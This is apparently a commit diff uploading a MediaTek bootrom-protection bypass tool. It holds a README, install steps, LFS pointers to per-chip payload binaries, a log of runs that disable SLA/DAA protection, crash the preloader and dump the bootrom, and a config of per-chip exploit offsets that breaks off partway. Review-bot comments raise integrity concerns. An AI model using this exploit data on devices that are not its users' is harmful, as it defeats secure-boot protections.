Androidrepairguide commited on
Commit
49d6718
1 Parent(s): 8dd7a9d

Upload folder using huggingface_hub

Files changed (50) hide show
  1. .gitattributes +2 -0
  2. HOW_TO_USE.txt +5 -0
  3. LICENSE +21 -0
  4. README.md +52 -0
  5. UsbDk_1.0.22_x64.msi +3 -0
  6. bypass_utility.log +258 -0
  7. default_config.json5 +216 -0
  8. exploits_collection/README.md +34 -0
  9. exploits_collection/default_config.json5 +216 -0
  10. exploits_collection/payloads/generic_dump_payload.bin +3 -0
  11. exploits_collection/payloads/generic_loader_payload.bin +3 -0
  12. exploits_collection/payloads/generic_reboot_payload.bin +3 -0
  13. exploits_collection/payloads/generic_uart_dump_payload.bin +3 -0
  14. exploits_collection/payloads/mt6261_payload.bin +3 -0
  15. exploits_collection/payloads/mt6572_payload.bin +3 -0
  16. exploits_collection/payloads/mt6580_payload.bin +3 -0
  17. exploits_collection/payloads/mt6582_payload.bin +3 -0
  18. exploits_collection/payloads/mt6592_payload.bin +3 -0
  19. exploits_collection/payloads/mt6595_payload.bin +3 -0
  20. exploits_collection/payloads/mt6735_payload.bin +3 -0
  21. exploits_collection/payloads/mt6737_payload.bin +3 -0
  22. exploits_collection/payloads/mt6739_payload.bin +3 -0
  23. exploits_collection/payloads/mt6750_payload.bin +3 -0
  24. exploits_collection/payloads/mt6753_payload.bin +3 -0
  25. exploits_collection/payloads/mt6755_payload.bin +3 -0
  26. exploits_collection/payloads/mt6757_payload.bin +3 -0
  27. exploits_collection/payloads/mt6761_payload.bin +3 -0
  28. exploits_collection/payloads/mt6763_payload.bin +3 -0
  29. exploits_collection/payloads/mt6765_payload.bin +3 -0
  30. exploits_collection/payloads/mt6768_payload.bin +3 -0
  31. exploits_collection/payloads/mt6771_payload.bin +3 -0
  32. exploits_collection/payloads/mt6779_payload.bin +3 -0
  33. exploits_collection/payloads/mt6785_payload.bin +3 -0
  34. exploits_collection/payloads/mt6795_payload.bin +3 -0
  35. exploits_collection/payloads/mt6797_payload.bin +3 -0
  36. exploits_collection/payloads/mt6799_payload.bin +3 -0
  37. exploits_collection/payloads/mt6833_payload.bin +3 -0
  38. exploits_collection/payloads/mt6853_payload.bin +3 -0
  39. exploits_collection/payloads/mt6873_payload.bin +3 -0
  40. exploits_collection/payloads/mt6885_payload.bin +3 -0
  41. exploits_collection/payloads/mt8127_payload.bin +3 -0
  42. exploits_collection/payloads/mt8163_payload.bin +3 -0
  43. exploits_collection/payloads/mt8167_payload.bin +3 -0
  44. exploits_collection/payloads/mt8173_payload.bin +3 -0
  45. exploits_collection/payloads/mt8590_payload.bin +3 -0
  46. exploits_collection/payloads/mt8695_payload.bin +3 -0
  47. libusb-1.0.dll +3 -0
  48. main.py +237 -0
  49. mtk-bypass-utility.zip +3 -0
  50. mtk_bypass.bat +1 -0
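--- a/.gitattributes
+++ b/.gitattributes
@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+UsbDk_1.0.22_x64.msi filter=lfs diff=lfs merge=lfs -text
+libusb-1.0.dll filter=lfs diff=lfs merge=lfs -text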
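Review bot: The two new rules add a third-party driver installer, UsbDk_1.0.22_x64.msi, and libusb-1.0.dll to the repository as LFS objects with nothing that ties either binary to an upstream release, so a user who installs the msi from this checkout has no way to confirm it is the build daynix published. The README sends users to the daynix GitHub releases page while HOW_TO_USE.txt says only `Install UsbDk (64-bit)`, so it is also unclear which copy they are expected to run. I would record the expected digests beside the install step — a `CHECKSUMS.txt` holding `<sha256>  UsbDk_1.0.22_x64.msi` and `<sha256>  libusb-1.0.dll` — and tell users to compare them with the upstream release asset; the LFS pointer already exposes the msi's sha256 (`91f6f695…`), so there is nothing extra to compute. If the upstream installer is Authenticode-signed (I have not checked), asking users to verify the publisher signature before installing is the stronger check.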
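--- a/HOW_TO_USE.txt
+++ b/HOW_TO_USE.txt
@@ -0,0 +1,5 @@
+1. Install python
+2. Install UsbDk (64-bit)
+3. Run `pip install pyusb==1.1.1 json5`
+4. Run `python main.py'
+5. Power off device & connect via usb in BROM Mode(https://androidrepairguide.blogspot.com/2025/04/connect-mediatek-device-in-brom-mode.html)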
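--- a/LICENSE
+++ b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2021 Dinolek
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.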
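--- a/README.md
+++ b/README.md
@@ -0,0 +1,52 @@
+# Mediatek Bypass utility
+
+> Personally tested on `Infinix Hot 10 Play X688B`
+
+Small utility to disable bootrom protection(sla and daa) on Mediatek devices
+
+## Usage on Windows
+
+Skip steps 1-3 after first usage
+
+1. Install [python (64-bit)](https://www.python.org/downloads)(select "Add Python X.X to PATH")
+2. Install [UsbDk (64-bit)](https://github.com/daynix/UsbDk/releases)
+3. Install pyusb, json5 with command:
+
+```
+pip install pyusb==1.1.1 json5
+```
+
+4. Run this command and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
+
+```
+python main.py
+```
+
+5. After that, without disconnecting phone, run SP Flash Tool
+
+## Usage on Linux
+
+Skip steps 1-2 after first usage
+To use kamakiri you need [FireISO](https://github.com/amonet-kamakiri/fireiso/releases) or [this patch](https://github.com/amonet-kamakiri/kamakiri/blob/master/kernel.patch) for your kernel
+
+Prebuilt kernels for various distros are available [here](https://github.com/amonet-kamakiri/prebuilt-kernels)
+
+1. Install python
+2. Install pyusb, json5 as root with command:
+
+```
+pip install pyusb json5
+```
+
+3. Run this command as root and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
+
+```
+./main.py
+```
+
+4. After that, without disconnecting phone, run SP Flash Tool in UART Connection mode
+
+## Credits
+
+- [@chaosmaster](https://github.com/chaosmaster)
+- [@xyzz](https://github.com/xyzz)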
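--- a/UsbDk_1.0.22_x64.msi
+++ b/UsbDk_1.0.22_x64.msi
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:91f6f695e1e13c656024e6d3b55620bf08d8835ef05ee0496935ba6bb62466a5
+size 6348800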
bypass_utility.log ADDED
@@ -0,0 +1,258 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [2025-03-30 18:55:40.163719] Waiting for device
2
+ [2025-03-30 18:55:52.424270] Found device = 0e8d:0003
3
+ [2025-03-30 18:55:52.650426] Device hw code: 0x766
4
+ [2025-03-30 18:55:52.650426] Device hw sub code: 0x8a00
5
+ [2025-03-30 18:55:52.651427] Device hw version: 0xca00
6
+ [2025-03-30 18:55:52.651427] Device sw version: 0x0
7
+ [2025-03-30 18:55:52.652427] Device secure boot: True
8
+ [2025-03-30 18:55:52.653429] Device serial link authorization: False
9
+ [2025-03-30 18:55:52.653429] Device download agent authorization: True
10
+ [2025-03-30 18:55:52.654428] Disabling watchdog timer
11
+ [2025-03-30 18:55:52.656534] Disabling protection
12
+ [2025-03-30 18:55:52.684046] Protection disabled
13
+ [2025-03-30 18:59:45.675191] Waiting for device
14
+ [2025-03-30 19:00:05.607088] Found device = 0e8d:0003
15
+ [2025-03-30 19:00:05.838795] Device hw code: 0x766
16
+ [2025-03-30 19:00:05.839797] Device hw sub code: 0x8a00
17
+ [2025-03-30 19:00:05.839797] Device hw version: 0xca00
18
+ [2025-03-30 19:00:05.840798] Device sw version: 0x0
19
+ [2025-03-30 19:00:05.841799] Device secure boot: True
20
+ [2025-03-30 19:00:05.842799] Device serial link authorization: False
21
+ [2025-03-30 19:00:05.843798] Device download agent authorization: True
22
+ [2025-03-30 19:00:05.844797] Disabling watchdog timer
23
+ [2025-03-30 19:00:05.846797] Disabling protection
24
+ [2025-03-30 19:00:05.874968] Protection disabled
25
+ [2025-03-30 19:06:55.042281] Waiting for device
26
+ [2025-03-30 19:07:02.741112] Found device = 0e8d:0003
27
+ [2025-03-30 19:07:02.963512] Device hw code: 0x766
28
+ [2025-03-30 19:07:02.964513] Device hw sub code: 0x8a00
29
+ [2025-03-30 19:07:02.965513] Device hw version: 0xca00
30
+ [2025-03-30 19:07:02.965513] Device sw version: 0x0
31
+ [2025-03-30 19:07:02.966513] Device secure boot: True
32
+ [2025-03-30 19:07:02.967514] Device serial link authorization: False
33
+ [2025-03-30 19:07:02.967514] Device download agent authorization: True
34
+ [2025-03-30 19:07:02.968514] Disabling watchdog timer
35
+ [2025-03-30 19:07:02.970879] Disabling protection
36
+ [2025-03-30 19:07:02.999589] Protection disabled
37
+ [2025-03-30 19:24:07.022011] Waiting for device
38
+ [2025-03-30 19:24:45.045941] Found device = 0e8d:0003
39
+ [2025-03-30 19:24:45.292066] Device hw code: 0x766
40
+ [2025-03-30 19:24:45.292066] Device hw sub code: 0x8a00
41
+ [2025-03-30 19:24:45.293068] Device hw version: 0xca00
42
+ [2025-03-30 19:24:45.295068] Device sw version: 0x0
43
+ [2025-03-30 19:24:45.296067] Device secure boot: True
44
+ [2025-03-30 19:24:45.296067] Device serial link authorization: False
45
+ [2025-03-30 19:24:45.297067] Device download agent authorization: True
46
+ [2025-03-30 19:24:45.298068] Disabling watchdog timer
47
+ [2025-03-30 19:24:45.300067] Disabling protection
48
+ [2025-03-30 19:24:45.331068] Protection disabled
49
+ [2025-03-30 14:27:17.677816] Waiting for device
50
+ [2025-03-30 14:28:01.724914] Found device = 0e8d:0003
51
+ [2025-03-30 14:28:01.972474] Device hw code: 0x766
52
+ [2025-03-30 14:28:01.972474] Device hw sub code: 0x8a00
53
+ [2025-03-30 14:28:01.973473] Device hw version: 0xca00
54
+ [2025-03-30 14:28:01.973473] Device sw version: 0x0
55
+ [2025-03-30 14:28:01.974474] Device secure boot: True
56
+ [2025-03-30 14:28:01.974474] Device serial link authorization: False
57
+ [2025-03-30 14:28:01.975473] Device download agent authorization: True
58
+ [2025-03-30 14:28:01.976475] Disabling watchdog timer
59
+ [2025-03-30 14:28:01.978241] Disabling protection
60
+ [2025-03-30 14:28:01.989243] Using kamakiri
61
+ [2025-03-30 14:28:01.999445] Protection disabled
62
+ [2025-03-30 14:31:17.857838] Waiting for device
63
+ [2025-03-30 14:31:26.788119] Found device = 0e8d:0003
64
+ [2025-03-30 14:31:27.015928] Device hw code: 0x766
65
+ [2025-03-30 14:31:27.016928] Device hw sub code: 0x8a00
66
+ [2025-03-30 14:31:27.016928] Device hw version: 0xca00
67
+ [2025-03-30 14:31:27.017929] Device sw version: 0x0
68
+ [2025-03-30 14:31:27.018927] Device secure boot: True
69
+ [2025-03-30 14:31:27.018927] Device serial link authorization: False
70
+ [2025-03-30 14:31:27.019928] Device download agent authorization: True
71
+ [2025-03-30 14:31:27.019928] Disabling watchdog timer
72
+ [2025-03-30 14:31:27.021927] Disabling protection
73
+ [2025-03-30 14:31:27.022929] Using kamakiri
74
+ [2025-03-30 14:31:27.034260] Protection disabled
75
+ [2025-03-30 15:00:38.624821] Waiting for device
76
+ [2025-03-30 15:00:49.075305] Found device = 0e8d:0003
77
+ [2025-03-30 15:00:49.301589] Device hw code: 0x766
78
+ [2025-03-30 15:00:49.302589] Device hw sub code: 0x8a00
79
+ [2025-03-30 15:00:49.303590] Device hw version: 0xca00
80
+ [2025-03-30 15:00:49.303590] Device sw version: 0x0
81
+ [2025-03-30 15:00:49.304589] Device secure boot: True
82
+ [2025-03-30 15:00:49.304589] Device serial link authorization: False
83
+ [2025-03-30 15:00:49.305590] Device download agent authorization: True
84
+ [2025-03-30 15:00:49.306591] Disabling watchdog timer
85
+ [2025-03-30 15:00:49.308590] Disabling protection
86
+ [2025-03-30 15:00:49.310590] Using kamakiri
87
+ [2025-03-30 15:00:49.321530] Protection disabled
88
+ [2025-03-30 15:58:29.967337] Waiting for device
89
+ [2025-03-30 15:58:53.410958] Found device = 0e8d:0003
90
+ [2025-03-30 15:58:53.710266] Device hw code: 0x766
91
+ [2025-03-30 15:58:53.711267] Device hw sub code: 0x8a00
92
+ [2025-03-30 15:58:53.711267] Device hw version: 0xca00
93
+ [2025-03-30 15:58:53.712267] Device sw version: 0x0
94
+ [2025-03-30 15:58:53.712267] Device secure boot: True
95
+ [2025-03-30 15:58:53.713267] Device serial link authorization: False
96
+ [2025-03-30 15:58:53.714266] Device download agent authorization: True
97
+ [2025-03-30 15:58:53.715266] Disabling watchdog timer
98
+ [2025-03-30 15:58:53.717291] Disabling protection
99
+ [2025-03-30 15:58:53.749015] Protection disabled
100
+ [2025-03-30 16:03:40.629448] Waiting for device
101
+ [2025-03-30 16:03:47.032978] Found device = 0e8d:0003
102
+ [2025-03-30 16:03:47.302838] Device hw code: 0x766
103
+ [2025-03-30 16:03:47.303838] Device hw sub code: 0x8a00
104
+ [2025-03-30 16:03:47.304839] Device hw version: 0xca00
105
+ [2025-03-30 16:03:47.305839] Device sw version: 0x0
106
+ [2025-03-30 16:03:47.306840] Device secure boot: True
107
+ [2025-03-30 16:03:47.307842] Device serial link authorization: False
108
+ [2025-03-30 16:03:47.308840] Device download agent authorization: True
109
+ [2025-03-30 16:03:47.308840] Disabling watchdog timer
110
+ [2025-03-30 16:03:47.311839] Disabling protection
111
+ [2025-03-30 16:03:47.342886] Protection disabled
112
+ [2025-03-30 16:04:19.031387] Waiting for device
113
+ [2025-03-30 16:04:36.829544] Found device = 0e8d:0003
114
+ [2025-03-30 16:04:37.098365] Device hw code: 0x766
115
+ [2025-03-30 16:04:37.098365] Device hw sub code: 0x8a00
116
+ [2025-03-30 16:04:37.099366] Device hw version: 0xca00
117
+ [2025-03-30 16:04:37.100366] Device sw version: 0x0
118
+ [2025-03-30 16:04:37.100366] Device secure boot: True
119
+ [2025-03-30 16:04:37.101367] Device serial link authorization: False
120
+ [2025-03-30 16:04:37.102367] Device download agent authorization: True
121
+ [2025-03-30 16:04:37.102367] Disabling watchdog timer
122
+ [2025-03-30 16:04:37.105274] Disabling protection
123
+ [2025-03-30 16:04:37.177177] Protection disabled
124
+ [2025-03-30 16:24:47.810791] Waiting for device
125
+ [2025-03-30 16:26:05.907340] Found device = 0e8d:2000
126
+ [2025-03-30 16:26:17.839154] Device hw code: 0x766
127
+ [2025-03-30 16:26:17.839154] Device hw sub code: 0x8a00
128
+ [2025-03-30 16:26:17.840160] Device hw version: 0xca00
129
+ [2025-03-30 16:26:17.841157] Device sw version: 0x0
130
+ [2025-03-30 16:26:17.842157] Device secure boot: True
131
+ [2025-03-30 16:26:17.843157] Device serial link authorization: False
132
+ [2025-03-30 16:26:17.843157] Device download agent authorization: True
133
+ [2025-03-30 16:26:17.845157] Found device in preloader mode, trying to crash...
134
+ [2025-03-30 16:26:17.847157] status is 7024
135
+ [2025-03-30 16:26:18.854501] Waiting for device
136
+ [2025-03-30 16:26:18.856501] Found device = 0e8d:0003
137
+ [2025-03-30 16:26:19.119788] Device hw code: 0x766
138
+ [2025-03-30 16:26:19.119788] Device hw sub code: 0x8a00
139
+ [2025-03-30 16:26:19.121053] Device hw version: 0xca00
140
+ [2025-03-30 16:26:19.122054] Device sw version: 0x0
141
+ [2025-03-30 16:26:19.122054] Device secure boot: True
142
+ [2025-03-30 16:26:19.123055] Device serial link authorization: False
143
+ [2025-03-30 16:26:19.124054] Device download agent authorization: True
144
+ [2025-03-30 16:26:19.124054] Disabling watchdog timer
145
+ [2025-03-30 16:26:19.126714] Disabling protection
146
+ [2025-03-30 16:26:19.156884] Protection disabled
147
+ [2025-03-30 16:28:14.415118] Waiting for device
148
+ [2025-03-30 16:28:14.417119] Found device = 0e8d:0003
149
+ [2025-03-30 16:28:14.684816] Device hw code: 0x766
150
+ [2025-03-30 16:28:14.685815] Device hw sub code: 0x8a00
151
+ [2025-03-30 16:28:14.686816] Device hw version: 0xca00
152
+ [2025-03-30 16:28:14.686816] Device sw version: 0x0
153
+ [2025-03-30 16:28:14.687816] Device secure boot: False
154
+ [2025-03-30 16:28:14.687816] Device serial link authorization: False
155
+ [2025-03-30 16:28:14.688817] Device download agent authorization: False
156
+ [2025-03-30 16:28:14.689818] Disabling watchdog timer
157
+ [2025-03-30 16:28:14.692135] Insecure device, sending payload using send_da
158
+ [2025-03-30 16:28:14.748482] Found send_dword, dumping bootrom to bootrom_766.bin
159
+ [2025-03-30 16:29:05.907328] Waiting for device
160
+ [2025-03-30 16:29:09.219474] Found device = 0e8d:2000
161
+ [2025-03-30 16:29:20.608828] Device hw code: 0x766
162
+ [2025-03-30 16:29:20.609829] Device hw sub code: 0x8a00
163
+ [2025-03-30 16:29:20.610816] Device hw version: 0xca00
164
+ [2025-03-30 16:29:20.610816] Device sw version: 0x0
165
+ [2025-03-30 16:29:20.612815] Device secure boot: True
166
+ [2025-03-30 16:29:20.613815] Device serial link authorization: False
167
+ [2025-03-30 16:29:20.613815] Device download agent authorization: True
168
+ [2025-03-30 16:29:20.614831] Found device in preloader mode, trying to crash...
169
+ [2025-03-30 16:29:20.617909] status is 7024
170
+ [2025-03-30 16:29:21.620024] Waiting for device
171
+ [2025-03-30 16:29:21.622036] Found device = 0e8d:0003
172
+ [2025-03-30 16:29:21.867785] Device hw code: 0x766
173
+ [2025-03-30 16:29:21.868785] Device hw sub code: 0x8a00
174
+ [2025-03-30 16:29:21.868785] Device hw version: 0xca00
175
+ [2025-03-30 16:29:21.869786] Device sw version: 0x0
176
+ [2025-03-30 16:29:21.869786] Device secure boot: True
177
+ [2025-03-30 16:29:21.870786] Device serial link authorization: False
178
+ [2025-03-30 16:29:21.871787] Device download agent authorization: True
179
+ [2025-03-30 16:29:21.872791] Disabling watchdog timer
180
+ [2025-03-30 16:29:21.875154] Disabling protection
181
+ [2025-03-30 16:29:21.905106] Protection disabled
182
+ [2025-03-30 16:48:01.676685] Waiting for device
183
+ [2025-03-30 16:48:01.677686] Found device = 0e8d:2000
184
+ [2025-03-30 16:48:13.037939] Device hw code: 0x766
185
+ [2025-03-30 16:48:13.037939] Device hw sub code: 0x8a00
186
+ [2025-03-30 16:48:13.038942] Device hw version: 0xca00
187
+ [2025-03-30 16:48:13.039941] Device sw version: 0x0
188
+ [2025-03-30 16:48:13.039941] Device secure boot: True
189
+ [2025-03-30 16:48:13.040941] Device serial link authorization: False
190
+ [2025-03-30 16:48:13.042941] Device download agent authorization: True
191
+ [2025-03-30 16:48:13.043942] Found device in preloader mode, trying to crash...
192
+ [2025-03-30 16:48:13.047942] status is 7024
193
+ [2025-03-30 16:48:14.057950] Waiting for device
194
+ [2025-03-30 16:48:14.058950] Found device = 0e8d:0003
195
+ [2025-03-30 16:48:14.320814] Device hw code: 0x766
196
+ [2025-03-30 16:48:14.321814] Device hw sub code: 0x8a00
197
+ [2025-03-30 16:48:14.322814] Device hw version: 0xca00
198
+ [2025-03-30 16:48:14.322814] Device sw version: 0x0
199
+ [2025-03-30 16:48:14.323814] Device secure boot: True
200
+ [2025-03-30 16:48:14.325324] Device serial link authorization: False
201
+ [2025-03-30 16:48:14.327346] Device download agent authorization: True
202
+ [2025-03-30 16:48:14.328346] Disabling watchdog timer
203
+ [2025-03-30 16:48:14.330887] Disabling protection
204
+ [2025-03-30 16:48:14.363226] Protection disabled
205
+ [2025-03-30 16:50:45.192561] Waiting for device
206
+ [2025-03-30 16:51:25.446559] Found device = 0e8d:2000
207
+ [2025-03-30 16:51:37.474047] Device hw code: 0x766
208
+ [2025-03-30 16:51:37.475048] Device hw sub code: 0x8a00
209
+ [2025-03-30 16:51:37.476050] Device hw version: 0xca00
210
+ [2025-03-30 16:51:37.477048] Device sw version: 0x0
211
+ [2025-03-30 16:51:37.477048] Device secure boot: True
212
+ [2025-03-30 16:51:37.478050] Device serial link authorization: False
213
+ [2025-03-30 16:51:37.479049] Device download agent authorization: True
214
+ [2025-03-30 16:51:37.480049] Found device in preloader mode, trying to crash...
215
+ [2025-03-30 16:51:37.482048] status is 7024
216
+ [2025-03-30 16:51:38.490922] Waiting for device
217
+ [2025-03-30 16:51:38.492932] Found device = 0e8d:0003
218
+ [2025-03-30 16:51:38.703067] Device hw code: 0x766
219
+ [2025-03-30 16:51:38.704575] Device hw sub code: 0x8a00
220
+ [2025-03-30 16:51:38.704575] Device hw version: 0xca00
221
+ [2025-03-30 16:51:38.706006] Device sw version: 0x0
222
+ [2025-03-30 16:51:38.707006] Device secure boot: True
223
+ [2025-03-30 16:51:38.708007] Device serial link authorization: False
224
+ [2025-03-30 16:51:38.709010] Device download agent authorization: True
225
+ [2025-03-30 16:51:38.709010] Disabling watchdog timer
226
+ [2025-03-30 16:51:38.711008] Disabling protection
227
+ [2025-03-30 16:51:38.741665] Protection disabled
228
+ [2025-03-30 17:29:04.508432] Waiting for device
229
+ [2025-03-30 17:29:25.433937] Found device = 0e8d:2000
230
+ [2025-03-30 17:29:36.976516] Device hw code: 0x766
231
+ [2025-03-30 17:29:36.977516] Device hw sub code: 0x8a00
232
+ [2025-03-30 17:29:36.978517] Device hw version: 0xca00
233
+ [2025-03-30 17:29:36.979518] Device sw version: 0x0
234
+ [2025-03-30 17:29:36.982520] Device secure boot: True
235
+ [2025-03-30 17:29:36.982520] Device serial link authorization: False
236
+ [2025-03-30 17:29:36.983517] Device download agent authorization: True
237
+ [2025-03-30 17:29:36.984519] Found device in preloader mode, trying to crash...
238
+ [2025-03-30 17:29:36.987517] status is 7024
239
+ [2025-03-30 17:29:37.998632] Waiting for device
240
+ [2025-03-30 17:29:38.000634] Found device = 0e8d:0003
241
+ [2025-03-30 17:29:38.267953] Device hw code: 0x766
242
+ [2025-03-30 17:29:38.267953] Device hw sub code: 0x8a00
243
+ [2025-03-30 17:29:38.269465] Device hw version: 0xca00
244
+ [2025-03-30 17:29:38.269465] Device sw version: 0x0
245
+ [2025-03-30 17:29:38.271801] Device secure boot: True
246
+ [2025-03-30 17:29:38.271801] Device serial link authorization: False
247
+ [2025-03-30 17:29:38.272799] Device download agent authorization: True
248
+ [2025-03-30 17:29:38.273802] Disabling watchdog timer
249
+ [2025-03-30 17:29:38.275799] Disabling protection
250
+ [2025-03-30 17:29:38.308307] Protection disabled
251
+ [2025-03-31 11:21:37.435686] Waiting for device
252
+ [2025-03-31 11:22:51.706012] Waiting for device
253
+ [2025-03-31 18:00:48.057530] Waiting for device
254
+ [2025-03-31 18:01:03.802597] Found device = 0e8d:2000
255
+ [2025-04-17 14:51:05.202982] Waiting for device
256
+ [2025-04-17 14:53:10.254121] Waiting for device
257
+ [2025-04-17 14:54:45.863924] Waiting for device
258
+ [2025-04-17 14:55:22.032165] Waiting for device
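Review bot: bypass_utility.log is a runtime artifact — 258 lines of per-session output from the author's own device (hw code 0x766) — and versioning it with the tool means every user run rewrites a tracked file, so it should not be in this commit. The log also shows a session that dumped the bootrom to `bootrom_766.bin` in the working directory (line 158), an artifact that would end up committed the same way. I would remove the file and add a `.gitignore` with `*.log` and `bootrom_*.bin`; the timestamps on lines 1–48 (18:55–19:24) precede those on line 49 (14:27) of the same day, which suggests the file is already a concatenation of more than one run's output rather than something meant to be shared.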
default_config.json5 ADDED
@@ -0,0 +1,216 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "0x6261": { // mt6261
3
+ "payload": "mt6261_payload.bin",
4
+ "var_1": 0x28,
5
+ "watchdog_address": 0xA0030000,
6
+ },
7
+
8
+ "0x6572": { // mt6572
9
+ "payload": "mt6572_payload.bin",
10
+ "payload_address": 0x10036A0,
11
+ "ptr_usbdl": 0x40ba68,
12
+ "ptr_da": 0x40befc,
13
+ },
14
+
15
+ "0x6580": { // mt6580
16
+ "payload": "mt6580_payload.bin",
17
+ "var_1": 0xAC,
18
+ "ptr_usbdl": 0xb60c,
19
+ "ptr_da": 0xba94,
20
+ },
21
+
22
+ "0x6582": { // mt6582
23
+ "payload": "mt6582_payload.bin",
24
+ "ptr_usbdl": 0xa5fc,
25
+ "ptr_da": 0xaa84,
26
+ },
27
+
28
+ "0x6592": { // mt6592
29
+ "payload": "mt6592_payload.bin",
30
+ "ptr_usbdl": 0xa564,
31
+ "ptr_da": 0xa9ec,
32
+ },
33
+
34
+ "0x6595": { // mt6595
35
+ "payload": "mt6595_payload.bin",
36
+ "ptr_usbdl": 0xb218,
37
+ "ptr_da": 0xb6a0,
38
+ },
39
+
40
+ "0x321": { // mt6735
41
+ "watchdog_address": 0x10212000,
42
+ "var_0": 0x10,
43
+ "var_1": 0x28,
44
+ "payload": "mt6735_payload.bin",
45
+ "ptr_usbdl": 0x95f8,
46
+ "ptr_da": 0x9a94,
47
+ },
48
+
49
+ "0x335": { // mt6737
50
+ "watchdog_address": 0x10212000,
51
+ "var_0": 0x10,
52
+ "var_1": 0x28,
53
+ "payload": "mt6737_payload.bin",
54
+ "ptr_usbdl": 0x9608,
55
+ "ptr_da": 0x9aa4,
56
+ },
57
+
58
+ "0x699": { // mt6739
59
+ "var_0": 0x20,
60
+ "var_1": 0xB4,
61
+ "payload": "mt6739_payload.bin",
62
+ "ptr_usbdl": 0xdf1c,
63
+ "ptr_da": 0xe3e8,
64
+ },
65
+
66
+ "0x337": { // mt6753
67
+ "watchdog_address": 0x10212000,
68
+ "var_1": 0x28,
69
+ "payload": "mt6753_payload.bin",
70
+ "ptr_usbdl": 0x9668,
71
+ "ptr_da": 0x9b04,
72
+ },
73
+
74
+ "0x326": { // mt6755
75
+ "payload": "mt6755_payload.bin",
76
+ "ptr_usbdl": 0x9a6c,
77
+ "ptr_da": 0x9f14,
78
+ },
79
+
80
+ "0x551": { // mt6757
81
+ "payload": "mt6757_payload.bin",
82
+ "ptr_usbdl": 0x9c2c,
83
+ "ptr_da": 0xa0e8,
84
+ },
85
+
86
+ "0x717": { // mt6761
87
+ "var_1": 0x25,
88
+ "payload": "mt6761_payload.bin",
89
+ "ptr_usbdl": 0xbc8c,
90
+ "ptr_da": 0xc158,
91
+ },
92
+
93
+ "0x690": { // mt6763
94
+ "var_1": 0x7F,
95
+ "payload": "mt6763_payload.bin",
96
+ "ptr_usbdl": 0xd66c,
97
+ "ptr_da": 0xdb38,
98
+ },
99
+
100
+ "0x766": { // mt6765
101
+ "var_0": 0x2C,
102
+ "var_1": 0x25,
103
+ "payload": "mt6765_payload.bin",
104
+ "ptr_usbdl": 0xbdc0,
105
+ "ptr_da": 0xc28c
106
+ },
107
+
108
+ "0x707": { // mt6768
109
+ "var_0": 0x2C,
110
+ "var_1": 0x25,
111
+ "payload": "mt6768_payload.bin",
112
+ "ptr_usbdl": 0xc190,
113
+ "ptr_da": 0xc650,
114
+ },
115
+
116
+ "0x788": { // mt6771
117
+ "var_0": 0x20,
118
+ "payload": "mt6771_payload.bin",
119
+ "ptr_usbdl": 0xdebc,
120
+ "ptr_da": 0xe388,
121
+ },
122
+
123
+ "0x725": { // mt6779
124
+ "payload": "mt6779_payload.bin",
125
+ "ptr_usbdl": 0xe04c,
126
+ "ptr_da": 0xe50c,
127
+ },
128
+
129
+ "0x813": { // mt6785
130
+ "payload": "mt6785_payload.bin",
131
+ "ptr_usbdl": 0xe2a4,
132
+ "ptr_da": 0xe764,
133
+ },
134
+
135
+ "0x6795": { // mt6795
136
+ "payload": "mt6795_payload.bin",
137
